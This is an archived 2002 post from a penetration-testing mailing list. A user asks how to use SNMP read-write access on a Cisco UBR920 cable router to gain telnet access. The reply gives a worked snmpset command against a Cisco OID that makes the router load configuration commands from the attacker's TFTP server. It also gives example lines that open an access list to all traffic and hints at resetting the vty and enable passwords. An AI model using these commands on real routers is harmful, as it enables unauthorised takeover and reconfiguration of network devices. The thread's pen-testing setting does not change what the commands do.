Home page logo
/

pen-test logo Penetration Testing mailing list archives

RE: Cisco UBR920 cable router - SNMP to change telnet passwords?
From: Friendly Guy <unix_boy_in_calgary3 () yahoo com>
Date: Wed, 27 Nov 2002 22:47:08 -0800 (PST)

Even though this is not exactly what you are looking
for, you might wanna give it a try. I used this in the
past to change configs & access-lists on remote Cisco
routers/switches, using only the RW community.
Basically, this is the method to upload "config t"
commands via TFTPBOOT. It basically gave me the access
to the router's configuration mode (conf t) command
line access. My box was set up as a TFTPBOOT & had the
commands in a script, exactly as how I would enter
them on the config t prompt.

For ex. to kill & open access-list 15, I had this in
my tftpboot script: 
no access-list 15
access-list 15 permit ip any any

You could obviously add whatever you need like "line
vty 0 4  no password PA$$WORD enable secret
SECRETPA$$" etc...


Here's how I did it. I did set up a TFTPBOOT server on
my box & sent an snmpset to the remote Cisco device. I
used a Solaris box to send my SNMP request, this box
had a TFTBOOT set up as well. The script was located
in the TFTPboot

snmpset -c   RWcommunity  IPADDRESS_of_the_router   
.1.3.6.1.4.1.9.2.1.55.IP_ADDRESS_OF_YOUR_TFTPBOOT   
octetstring    name_of_the_config_on_the_tftp

Ex:
node 10.10.10.198
RW private
tftpboot address:   192.168.4.119
File located in TFTPBOOT directory, containing the
list of configuration commands:   confg_file

snmpset -c  private 10.10.10.198
.1.3.6.1.4.1.9.2.1.55.192.168.4.119 octetstring
confg_file

I used this little shortcut 'internally' & not on out
on the internet. I hope this works for you out
there...
Cheers,

Sylvain Robichaud



-----Original Message-----

From: Wolf, Glenn [mailto:glenn.wolf () we-inc com] 

Sent: November 26, 2002 2:10 PM

To: pen-test () securityfocus com

Subject: Cisco UBR920 cable router - SNMP to change
telnet passwords?



Hi,

As per the following vulnerability:
http://online.securityfocus.com/bid/3758

... does anyone know how to exploit SNMP read-write
access to change or retrieve the usernames/passwords
protecting the telnet access? I have SNMP read-write
access on the Cisco UBR920 cable router, so I could
DoS it, but I'm looking for further access.

Thanks in advance,

Glenn

----------------------------------------------------------------------------

This list is provided by the SecurityFocus Security
Intelligence Alert (SIA) Service. For more information
on SecurityFocus' SIA service which automatically
alerts you to the latest security vulnerabilities
please see: https://alerts.securityfocus.com/


__________________________________________________
Do you Yahoo!?
Yahoo! Mail Plus - Powerful. Affordable. Sign up now.
http://mailplus.yahoo.com

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]